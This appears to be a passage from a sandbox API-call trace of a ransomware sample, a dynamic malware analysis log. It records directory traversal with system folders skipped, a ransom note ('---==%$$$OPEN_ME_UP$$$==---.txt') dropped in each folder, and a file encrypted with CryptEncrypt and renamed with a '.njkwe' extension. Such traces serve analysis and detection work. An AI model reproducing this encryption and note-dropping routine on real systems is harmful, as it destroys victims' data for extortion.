pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections") returned 48 [0073.821] lstrcmpW (lpString1="Connections", lpString2=".") returned 1 [0073.821] lstrcmpW (lpString1="Connections", lpString2="..") returned 1 [0073.821] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.821] GetProcessHeap () returned 0xbe0000 [0073.821] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.821] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*") returned 50 [0073.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19e20 [0073.822] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.822] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.822] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.822] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.822] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.822] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\.") returned 50 [0073.822] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.822] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.822] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.822] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.822] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.822] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.822] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.822] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\..") returned 51 [0073.822] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.822] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf245536, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Cm", cAlternateFileName="")) returned 1 [0073.822] lstrcmpiW (lpString1="Cm", lpString2="Windows") returned -1 [0073.822] lstrcmpiW (lpString1="Cm", lpString2="$Recycle.bin") returned 1 [0073.822] lstrcmpiW (lpString1="Cm", lpString2="System Volume Information") returned -1 [0073.822] lstrcmpiW (lpString1="Cm", lpString2="Program Files") returned -1 [0073.822] lstrcmpiW (lpString1="Cm", lpString2="Program Files (x86)") returned -1 [0073.822] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm") returned 51 [0073.822] lstrcmpW (lpString1="Cm", lpString2=".") returned 1 [0073.822] lstrcmpW (lpString1="Cm", lpString2="..") returned 1 [0073.822] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.822] GetProcessHeap () returned 0xbe0000 [0073.822] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.822] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\*") returned 53 [0073.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf245536, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1e0 [0073.823] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.823] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.823] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.823] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.823] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.823] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\.") returned 53 [0073.823] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.824] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf245536, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.824] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.824] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.824] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.824] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.824] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.824] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\..") returned 54 [0073.824] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.824] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.824] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcf245536, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xcf245536, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xcf245536, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.824] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0073.824] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 83 [0073.824] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\cm\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.825] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.826] CloseHandle (hObject=0x434) returned 1 [0073.826] GetProcessHeap () returned 0xbe0000 [0073.826] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.826] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0745f2f, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xbd895aed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe0745f2f, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="CM_old", cAlternateFileName="")) returned 1 [0073.826] lstrcmpiW (lpString1="CM_old", lpString2="Windows") returned -1 [0073.826] lstrcmpiW (lpString1="CM_old", lpString2="$Recycle.bin") returned 1 [0073.826] lstrcmpiW (lpString1="CM_old", lpString2="System Volume Information") returned -1 [0073.826] lstrcmpiW (lpString1="CM_old", lpString2="Program Files") returned -1 [0073.826] lstrcmpiW (lpString1="CM_old", lpString2="Program Files (x86)") returned -1 [0073.826] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old") returned 55 [0073.826] lstrcmpW (lpString1="CM_old", lpString2=".") returned 1 [0073.826] lstrcmpW (lpString1="CM_old", lpString2="..") returned 1 [0073.826] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.826] GetProcessHeap () returned 0xbe0000 [0073.826] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.826] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\*") returned 57 [0073.826] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0745f2f, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xbd895aed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe0745f2f, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0073.827] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.827] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.827] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.827] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.827] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.827] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\.") returned 57 [0073.827] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.827] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0745f2f, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xbd895aed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe0745f2f, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.827] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.827] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.827] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.828] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.828] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.828] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\..") returned 58 [0073.828] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.828] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.828] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0745f2f, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xbd895aed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe0745f2f, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.828] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0073.828] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 87 [0073.828] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\CM_old\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\cm_old\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.828] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.829] CloseHandle (hObject=0x434) returned 1 [0073.829] GetProcessHeap () returned 0xbe0000 [0073.829] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.829] FindNextFileW (in: hFindFile=0xc19e20, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe0745f2f, ftCreationTime.dwHighDateTime=0x1d32720, ftLastAccessTime.dwLowDateTime=0xbd895aed, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe0745f2f, ftLastWriteTime.dwHighDateTime=0x1d32720, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="CM_old", cAlternateFileName="")) returned 0 [0073.829] FindClose (in: hFindFile=0xc19e20 | out: hFindFile=0xc19e20) returned 1 [0073.829] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 80 [0073.829] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Connections\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\network\\connections\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.830] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.830] CloseHandle (hObject=0x430) returned 1 [0073.830] GetProcessHeap () returned 0xbe0000 [0073.830] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.830] FindNextFileW (in: hFindFile=0xc19da0, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc6206d3e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc6206d3e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0073.831] lstrcmpiW (lpString1="Downloader", lpString2="Windows") returned -1 [0073.831] lstrcmpiW (lpString1="Downloader", lpString2="$Recycle.bin") returned 1 [0073.831] lstrcmpiW (lpString1="Downloader", lpString2="System Volume Information") returned -1 [0073.831] lstrcmpiW (lpString1="Downloader", lpString2="Program Files") returned -1 [0073.831] lstrcmpiW (lpString1="Downloader", lpString2="Program Files (x86)") returned -1 [0073.831] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader") returned 47 [0073.831] lstrcmpW (lpString1="Downloader", lpString2=".") returned 1 [0073.831] lstrcmpW (lpString1="Downloader", lpString2="..") returned 1 [0073.831] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.831] GetProcessHeap () returned 0xbe0000 [0073.831] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.831] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*") returned 49 [0073.831] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc6206d3e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc6206d3e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19de0 [0073.831] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.831] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.831] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.831] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.831] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.831] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\.") returned 49 [0073.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.831] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17cbb4ff, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc6206d3e, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xc6206d3e, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.831] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.831] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.831] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.831] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.831] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.831] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\..") returned 50 [0073.831] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.832] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e734dc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e734dc, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4bfc4c41, ftLastWriteTime.dwHighDateTime=0x1d5c439, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="edb.chk", cAlternateFileName="")) returned 1 [0073.832] lstrcmpiW (lpString1="edb.chk", lpString2="Windows") returned -1 [0073.832] lstrcmpiW (lpString1="edb.chk", lpString2="$Recycle.bin") returned 1 [0073.832] lstrcmpiW (lpString1="edb.chk", lpString2="System Volume Information") returned -1 [0073.832] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files") returned -1 [0073.832] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files (x86)") returned -1 [0073.832] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk") returned 55 [0073.832] StrStrIW (lpFirst="edb.chk", lpSrch=".njkwe") returned 0x0 [0073.832] lstrcmpW (lpString1="edb.chk", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.832] lstrcmpW (lpString1="edb.chk", lpString2="taridd") returned -1 [0073.832] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.832] GetTickCount () returned 0x1152d08 [0073.832] GetTickCount () returned 0x1152d08 [0073.832] GetTickCount () returned 0x1152d08 [0073.832] GetTickCount () returned 0x1152d08 [0073.832] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.832] GetProcessHeap () returned 0xbe0000 [0073.832] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.832] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x2000, lpOverlapped=0x0) returned 1 [0073.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.833] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x2000, lpOverlapped=0x0) returned 1 [0073.833] GetProcessHeap () returned 0xbe0000 [0073.833] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.833] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.833] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.833] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.833] CloseHandle (hObject=0x434) returned 1 [0073.833] GetProcessHeap () returned 0xbe0000 [0073.833] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.833] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk_r00t_{3sXlE5}.njkwe") returned 75 [0073.833] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edb.chk"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Network\\Downloader\\edb.chk_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\network\\downloader\\edb.chk_r00t_{3sxle5}.njkwe")) returned 1 [0073.834] GetProcessHeap () returned 0xbe0000 [0073.834] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.834] FindNextFileW (in: hFindFile=0xc19de0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5e26fff, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc5e26fff, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x576f6993, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x140000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="edb.log", cAlternateFileName="")) returned 1 [0073.834] lstrcmpiW (lpString1="edb.log", lpString2="Windows") returned -1 [0073.834] lstrcmpiW (lpString1="edb.log", lpString2="$Recycle.bin") returned 1 [0073.834] lstrcmpiW (lpString1="edb.log", lpString2="System Volume Information") returned -1 [0073.834] lstrcmpiW (lpString1="edb.log", lpString2="Program Files") returned -1 [0073.834] lstrcmpiW (lpString1="edb.log", lpString2="Program Files (x86)") returned -1 